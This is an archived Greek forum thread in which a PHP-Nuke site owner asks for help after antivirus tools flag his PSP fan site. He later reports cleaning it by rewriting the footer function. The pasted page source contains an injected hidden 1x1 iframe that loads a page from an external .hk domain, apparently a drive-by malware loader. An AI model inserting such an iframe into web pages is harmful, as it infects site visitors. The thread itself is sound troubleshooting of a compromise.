Προς το περιεχόμενο

Αρχειοθετημένο

Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.

  • 0
gherudos

Πρόβλημα phpnuke

Ερώτηση

Το site είναι βασισμένο σto phpnuke.Τις τελευταίες ημέρες τα antivirus/firewall πετάνε ένα error οταν κάποιος προσπαθεί να μπεί στο main site http://www.pspgr.uni.cc με internet explorer.Με μια γρήγορη ματιά χρησιμοποιώντας το firefox για να δούμε το page source βλέπουμε προς το τέλος του κώδικα αυτό:

 

<font class="footmsg">

ΥΠΟΣΤΗΡΙΞΤΕ ΤΙΣ ΕΤΑΙΡΙΕΣ ΠΟΥ ΠΑΡΑΓΟΥΝ ΠΟΙΟΤΙΚΑ ΠΡΟΓΡΑΜΜΑΤΑ!<br>

ΑΝ ΑΠΟΛΑΥΣΑΤΕ ΕΝΑ ΠΡΟΪΟΝ, ΑΓΟΡΑΣΤΕ ΤΟ! ΟΙ ΚΑΤΑΣΚΕΥΑΣΤΕΣ ΠΡΟΓΡΑΜΜΑΤΩΝ ΑΞΙΖΟΥΝ ΥΠΟΣΤΗΡΙΞΗ!!<br><br>

Αυτός ο δικτυακός τόπος δεν συνδέετε με την Sony Corp.<br>

 

"Sony" "PSP" και τα σήματα του PSP είναι εμπορικά σήματα της Sony Corp.<br><br>

Η χρήση αυτού του site συνεπάγετε με την αποδοχή των <a href="http://www.octapus.net/phpnuke/modules.php?name=Legal">Όρων Χρήσης της Υπηρεσίας</a> και της <a href="http://www.octapus.net/phpnuke/modules.php?name=Privacy">Πολιτικής Προστασίας Προσωπικών Δεδομένων</a><br>

Copyright © 2005 - 2006 PSPGR All Rights Reserved<br><br>

<a href=http://phpnuke.org><font class=footmsg_l>PHP-Nuke</font></a> Copyright © 2005 by Francisco Burzi. This is free software and you may redistribute it under the <a href=http://phpnuke.org/files/gpl.txt><font class=footmsg_l>GPL</font></a>. PHP-Nuke comes with absolutely no warranty for details see the <a href=http://phpnuke.org/files/gpl.txt><font class=footmsg_l>license</font></a>.<iframe src=http://wbqkqibkdz.hk/dl/adv451.php width=1 height=1></iframe><!--i--><br>Page Generation: 0.220 Seconds<br>

 

το σημείωσα με κόκκινο για να καταλάβετε τι εννοώ.Βλέποντας το παραπάνω η πρώτη μας σκέψη είναι ότι κρύβεται μέσα στο footer.php δυστυχώς όμως δεν είναι εκεί.Αν κάποιος έχει αντιμετωπίσει το ίδιο ή παρόμοιο πρόβλημα και γνωρίζει τη λύση του σας παρακαλώ να με βοηθήσει.

Ευχαριστώ.

Κοινοποιήστε αυτήν την ανάρτηση


Σύνδεσμος στην ανάρτηση
Κοινοποίηση σε άλλες σελίδες

3 απαντήσεις σε αυτή την ερώτηση

Προτεινόμενες αναρτήσεις

Επιτέλους το έλυσα το πρόβλημα.Όλη η ιστορία γινόταν μέσα στο footer.php

Πιο αναλυτικά:

Διέγραψα το αρχικό function footmsg του κώδικα και το αντικατέστησα με αυτό:

>function footmsg() {
echo "<font class=\"footmsg\">\n";

}

Το copyright εξαφανίστηκε από το κάτω μέρος της σελίδας και μαζί του πήρε και το malicious code :)

Πλέον είμαστε καθαροί!

Κοινοποιήστε αυτήν την ανάρτηση


Σύνδεσμος στην ανάρτηση
Κοινοποίηση σε άλλες σελίδες

Φίλε μου, αυτό το iframe προφανώς το δημιουργεί ο κώδικας που χρησιμοποιείς και - παρ' ότι δεν θα δοκιμάσω να επισκεφτώ το URL - υποψιάζομαι ότι είναι hack που κατεβάζει ιούς στον υπολογιστή των επισκεπτών. Και ποιός ξέρει τι άλλο θα βρεις εκεί μέσα από hacks.

Κοινοποιήστε αυτήν την ανάρτηση


Σύνδεσμος στην ανάρτηση
Κοινοποίηση σε άλλες σελίδες

Δεν σε γεμίζει ιούς,ένα trojan κολλάει ο internet explorer κι εμφανίζει διαφημίσεις.Το θέμα είναι ότι δεν μπορώ να βρώ που κρύβεται ο κώδικας αυτός,μέσα σε ποιο αρχείο ώστε να διαγράψω εκείνο το κομμάτι.

Κοινοποιήστε αυτήν την ανάρτηση


Σύνδεσμος στην ανάρτηση
Κοινοποίηση σε άλλες σελίδες
×
×
  • Δημιουργία νέου...